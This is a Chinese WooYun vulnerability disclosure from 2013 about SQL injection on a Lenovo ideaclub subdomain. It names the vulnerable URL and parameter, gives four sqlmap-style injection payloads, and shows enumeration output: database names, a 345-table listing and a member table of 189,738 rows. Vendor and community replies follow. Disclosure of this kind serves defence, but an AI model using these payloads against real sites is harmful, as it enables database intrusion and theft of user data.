当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-036396

漏洞标题:联想安全问题十三某分站SQL注射漏洞(189738用户数据)

相关厂商:联想

漏洞作者: VIP

提交时间:2013-09-08 11:50

修复时间:2013-10-23 11:51

公开时间:2013-10-23 11:51

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-09-08: 细节已通知厂商并且等待厂商处理中
2013-09-09: 厂商已经确认,细节仅向厂商公开
2013-09-19: 细节向核心白帽子及相关领域专家公开
2013-09-29: 细节向普通白帽子公开
2013-10-09: 细节向实习白帽子公开
2013-10-23: 细节向公众公开

简要描述:

联想的礼物到了,比别的大多数厂商都要丰厚的多的多的多(包含一块三星120G SSD固态)

详细说明:

注射点:
http://ideaclub.lenovo.com.cn/club/index.php?m=store&c=index&f=getPlace&item_id=ad2dc941e1fb11e29c5fc89cdcd8545b

漏洞证明:

---
Place: GET
Parameter: item_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: m=store&c=index&f=getPlace&item_id=ad2dc941e1fb11e29c5fc89cdcd8545b
' AND 3075=3075 AND 'HSHZ'='HSHZ
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: m=store&c=index&f=getPlace&item_id=ad2dc941e1fb11e29c5fc89cdcd8545b
' AND (SELECT 1518 FROM(SELECT COUNT(*),CONCAT(0x7176717471,(SELECT (CASE WHEN (
1518=1518) THEN 1 ELSE 0 END)),0x7164647071,FLOOR(RAND(0)*2))x FROM INFORMATION_
SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'WOvh'='WOvh
Type: UNION query
Title: MySQL UNION query (NULL) - 10 columns
Payload: m=store&c=index&f=getPlace&item_id=ad2dc941e1fb11e29c5fc89cdcd8545b
' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176717471,0x615568567
4576d7a6b6a,0x7164647071),NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: m=store&c=index&f=getPlace&item_id=ad2dc941e1fb11e29c5fc89cdcd8545b
' AND SLEEP(5) AND 'REay'='REay
---


web application technology: Nginx
back-end DBMS: MySQL 5.0


available databases [4]:
[*] erazer
[*] ideaclub
[*] ideaclub2
[*] information_schema


current user:    'ideaclub@localhost'


current database:    'ideaclub2'


Database: ideaclub2
[345 tables]
+------------------------------------+
| c_activity_member |
| c_asset_tbl |
| c_asset_tbl_content_tbl |
| c_comment |
| c_config |
| c_content_tbl |
| c_content_tbl_download_tbl |
| c_content_tbl_system_menu |
| c_content_tbl_template_tbl |
| c_dictionary_map |
| c_dictionary_sort |
| c_download_tbl |
| c_evil_ip |
| c_experience_store |
| c_expstore |
| c_goods |
| c_goods_convert |
| c_goods_img |
| c_item_tbl |
| c_item_tbl_download_tbl |
| c_keywords |
| c_m_ad |
| c_m_campaisn |
| c_m_media |
| c_m_tracker |
| c_member |
| c_member_action |
| c_member_action_score |
| c_member_attention |
| c_member_bind |
| c_member_bind_douban |
| c_member_bind_qq |
| c_member_bind_renren |
| c_member_bind_sina |
| c_member_login_count |
| c_member_profile |
| c_member_score |
| c_member_verifycode |
| c_member_visit |
| c_reg_user |
| c_store_activity_comment |
| c_store_products |
| c_system_function |
| c_system_menu |
| c_system_menu_function |
| c_system_menu_template_tbl |
| c_system_role |
| c_system_role_function |
| c_system_user |
| c_system_user_role |
| c_template_tbl |
| f_common_admincp_cmenu |
| f_common_admincp_group |
| f_common_admincp_member |
| f_common_admincp_perm |
| f_common_admincp_session |
| f_common_admingroup |
| f_common_adminnote |
| f_common_advertisement |
| f_common_advertisement_custom |
| f_common_banned |
| f_common_block |
| f_common_block_favorite |
| f_common_block_item |
| f_common_block_item_data |
| f_common_block_permission |
| f_common_block_pic |
| f_common_block_style |
| f_common_block_xml |
| f_common_cache |
| f_common_card |
| f_common_card_log |
| f_common_card_type |
| f_common_connect_guest |
| f_common_credit_log |
| f_common_credit_rule |
| f_common_credit_rule_log |
| f_common_credit_rule_log_field |
| f_common_cron |
| f_common_devicetoken |
| f_common_district |
| f_common_diy_data |
| f_common_domain |
| f_common_failedlogin |
| f_common_friendlink |
| f_common_grouppm |
| f_common_invite |
| f_common_magic |
| f_common_magiclog |
| f_common_mailcron |
| f_common_mailqueue |
| f_common_member |
| f_common_member_action_log |
| f_common_member_connect |
| f_common_member_count |
| f_common_member_crime |
| f_common_member_field_forum |
| f_common_member_field_home |
| f_common_member_fivecube |
| f_common_member_grouppm |
| f_common_member_log |
| f_common_member_lottery |
| f_common_member_magic |
| f_common_member_medal |
| f_common_member_profile |
| f_common_member_profile_setting |
| f_common_member_profile_update_log |
| f_common_member_security |
| f_common_member_stat_field |
| f_common_member_status |
| f_common_member_validate |
| f_common_member_verify |
| f_common_member_verify_info |
| f_common_myapp |
| f_common_myinvite |
| f_common_mytask |
| f_common_nav |
| f_common_onlinetime |
| f_common_patch |
| f_common_plugin |
| f_common_plugin_reminder |
| f_common_pluginvar |
| f_common_process |
| f_common_regip |
| f_common_relatedlink |
| f_common_report |
| f_common_searchindex |
| f_common_secquestion |
| f_common_session |
| f_common_setting |
| f_common_smiley |
| f_common_sphinxcounter |
| f_common_stat |
| f_common_statuser |
| f_common_style |
| f_common_stylevar |
| f_common_syscache |
| f_common_tag |
| f_common_tagitem |
| f_common_task |
| f_common_taskvar |
| f_common_template |
| f_common_template_block |
| f_common_template_permission |
| f_common_uin_black |
| f_common_usergroup |
| f_common_usergroup_field |
| f_common_word |
| f_common_word_type |
| f_connect_disktask |
| f_connect_feedlog |
| f_connect_memberbindlog |
| f_connect_postfeedlog |
| f_connect_tthreadlog |
| f_forum_access |
| f_forum_activity |
| f_forum_activityapply |
| f_forum_announcement |
| f_forum_attachment |
| f_forum_attachment_0 |
| f_forum_attachment_1 |
| f_forum_attachment_2 |
| f_forum_attachment_3 |
| f_forum_attachment_4 |
| f_forum_attachment_5 |
| f_forum_attachment_6 |
| f_forum_attachment_7 |
| f_forum_attachment_8 |
| f_forum_attachment_9 |
| f_forum_attachment_exif |
| f_forum_attachment_unused |
| f_forum_attachtype |
| f_forum_bbcode |
| f_forum_collection |
| f_forum_collectioncomment |
| f_forum_collectionfollow |
| f_forum_collectioninvite |
| f_forum_collectionrelated |
| f_forum_collectionteamworker |
| f_forum_collectionthread |
| f_forum_creditslog |
| f_forum_debate |
| f_forum_debatepost |
| f_forum_faq |
| f_forum_forum |
| f_forum_forum_threadtable |
| f_forum_forumfield |
| f_forum_forumrecommend |
| f_forum_groupcreditslog |
| f_forum_groupfield |
| f_forum_groupinvite |
| f_forum_grouplevel |
| f_forum_groupuser |
| f_forum_imagetype |
| f_forum_medal |
| f_forum_medallog |
| f_forum_memberrecommend |
| f_forum_moderator |
| f_forum_modwork |
| f_forum_onlinelist |
| f_forum_order |
| f_forum_poll |
| f_forum_polloption |
| f_forum_pollvoter |
| f_forum_post |
| f_forum_post_location |
| f_forum_post_moderate |
| f_forum_post_tableid |
| f_forum_postcache |
| f_forum_postcomment |
| f_forum_postlog |
| f_forum_poststick |
| f_forum_promotion |
| f_forum_ratelog |
| f_forum_relatedthread |
| f_forum_replycredit |
| f_forum_rsscache |
| f_forum_spacecache |
| f_forum_statlog |
| f_forum_thread |
| f_forum_thread_moderate |
| f_forum_threadaddviews |
| f_forum_threadclass |
| f_forum_threadclosed |
| f_forum_threaddisablepos |
| f_forum_threadimage |
| f_forum_threadlog |
| f_forum_threadmod |
| f_forum_threadpartake |
| f_forum_threadpreview |
| f_forum_threadrush |
| f_forum_threadtype |
| f_forum_trade |
| f_forum_tradecomment |
| f_forum_tradelog |
| f_forum_typeoption |
| f_forum_typeoptionvar |
| f_forum_typevar |
| f_forum_warning |
| f_home_album |
| f_home_album_category |
| f_home_appcreditlog |
| f_home_blacklist |
| f_home_blog |
| f_home_blog_category |
| f_home_blog_moderate |
| f_home_blogfield |
| f_home_class |
| f_home_click |
| f_home_clickuser |
| f_home_comment |
| f_home_comment_moderate |
| f_home_docomment |
| f_home_doing |
| f_home_doing_moderate |
| f_home_favorite |
| f_home_feed |
| f_home_feed_app |
| f_home_follow |
| f_home_follow_feed |
| f_home_follow_feed_archiver |
| f_home_friend |
| f_home_friend_request |
| f_home_friendlog |
| f_home_notification |
| f_home_pic |
| f_home_pic_moderate |
| f_home_picfield |
| f_home_poke |
| f_home_pokearchive |
| f_home_share |
| f_home_share_moderate |
| f_home_show |
| f_home_specialuser |
| f_home_userapp |
| f_home_userappfield |
| f_home_visitor |
| f_infbox |
| f_infbox_setting |
| f_mobile_setting |
| f_plugin_wodexunzhang |
| f_plugin_wodexunzhang_ershou |
| f_plugin_wodexunzhang_fenlei |
| f_plugin_wodexunzhang_kucun |
| f_plugin_wodexunzhang_log |
| f_plugin_wodexunzhang_user |
| f_portal_article_content |
| f_portal_article_count |
| f_portal_article_moderate |
| f_portal_article_related |
| f_portal_article_title |
| f_portal_article_trash |
| f_portal_attachment |
| f_portal_category |
| f_portal_category_permission |
| f_portal_comment |
| f_portal_comment_moderate |
| f_portal_rsscache |
| f_portal_topic |
| f_portal_topic_pic |
| f_security_evilpost |
| f_security_eviluser |
| f_security_failedlog |
| f_ucenter_admins |
| f_ucenter_applications |
| f_ucenter_badwords |
| f_ucenter_domains |
| f_ucenter_failedlogins |
| f_ucenter_feeds |
| f_ucenter_friends |
| f_ucenter_mailqueue |
| f_ucenter_memberfields |
| f_ucenter_members |
| f_ucenter_members_csv |
| f_ucenter_mergemembers |
| f_ucenter_newpm |
| f_ucenter_notelist |
| f_ucenter_pm_indexes |
| f_ucenter_pm_lists |
| f_ucenter_pm_members |
| f_ucenter_pm_messages_0 |
| f_ucenter_pm_messages_1 |
| f_ucenter_pm_messages_2 |
| f_ucenter_pm_messages_3 |
| f_ucenter_pm_messages_4 |
| f_ucenter_pm_messages_5 |
| f_ucenter_pm_messages_6 |
| f_ucenter_pm_messages_7 |
| f_ucenter_pm_messages_8 |
| f_ucenter_pm_messages_9 |
| f_ucenter_protectedmembers |
| f_ucenter_settings |
| f_ucenter_sqlcache |
| f_ucenter_tags |
| f_ucenter_vars |
| ld_member_prize |
| ld_prize_config |
| ld_prize_log |
| ld_prize_setting |
| ld_prize_test |
| ld_receive_address |
| temp_common_member |
| temp_member |
| temp_un |
| tmp_id |
+------------------------------------+


Database: ideaclub2
+-----------------+---------+
| Table | Entries |
+-----------------+---------+
| f_common_member | 189738 |
+-----------------+---------+

修复方案:

过滤哦

版权声明:转载请注明来源 VIP@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2013-09-09 17:17

厂商回复:

这个貌似跟 你之前提交的重复了 http://www.wooyun.org/bugs/wooyun-2013-035312.

最新状态:

暂无


漏洞评价:

评论

  1. 2013-09-08 20:45 | PgHook ( 普通白帽子 | Rank:964 漏洞数:115 | ...........................................)

    你这是诱惑我们啊!!!!!!

  2. 2013-09-09 12:28 | Lee Swagger ( 路人 | Rank:28 漏洞数:5 | 洗洗睡吧)

    @VIP 除了SSD 还有其他的什么东西

  3. 2013-10-20 13:47 | 沦沦 ( 普通白帽子 | Rank:504 漏洞数:127 | 爱老婆,爱生活)

    求搞基,求交流